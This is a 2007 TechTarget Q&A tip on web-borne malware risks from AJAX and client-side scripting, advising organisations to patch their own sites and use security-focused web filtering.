Tip

Keeping the AJAX door closed

Q: My end-users are spending a lot of time on Web 2.0 sites that use a lot of AJAX and other new technologies. Does this open any new attack vectors into our organisation?

A: Yes. but not just "because it's Web 2.0." Very many sites these days rely on some sort of client-side scripting, usually JavaScript (the "J" in "AJAX" or VisualBasic Script), regardless of whether they see themselves as part of Web 2.0 or not. This means that the web browser has almost turned into an operating system + application stack of its own. Unsurprisingly, this means that cybercriminals are switching their malware distribution mechanisms from email to the web.

Recent Sophos stats show that over 70% of new web-borne malware is hosted on compromised sites, often inside businesses -- not on sites deliberately set up for criminal misuse. In other words, we, the Good Guys, are collectively providing more than two-thirds of the malware delivery ammo available to web-savvy cybercmininals. And Sophos turns up an average of about 5000 new URLs hosting malware (are you ready for this?) per _day_.

(Some days it's many more than that.)

Solutions:

  1. Web security begins at home. Make sure your own company's web presence is patched and safe against remote compromise, whether from without or within. An internal infection of the Psyme family of malware, for instance, can inject malicious code

Requires Free Membership to View

  1. into thousands of HTML and PHP files on your servers in minutes. Keep that anti-virus and those OS/application patches up-to-date, on servers and wokstations.

  2. Consider going for a web filtering solution which is focused on security, not just staff productivity. Blocking outward access to disallowed porn and gambling sites is probably very important. But active malware filtering of all inbound data, even from apparently legitimate sites, is a must these days. To look for malicious scripts, iframes and the like in downloaded HTML pages, or to spot exploit shellcode in apparently-innocent pictures or cursor files, you probably need specialist help from a commercial product.

 

This was first published in May 2007

Disclaimer: Our Tips Exchange is a forum for you to share technical advice and expertise with your peers and to learn from other enterprise IT professionals. TechTarget provides the infrastructure to facilitate this sharing of information. However, we cannot guarantee the accuracy or validity of the material submitted. You agree that your use of the Ask The Expert services and your reliance on any questions, answers, information or other materials received through this Web site is at your own risk.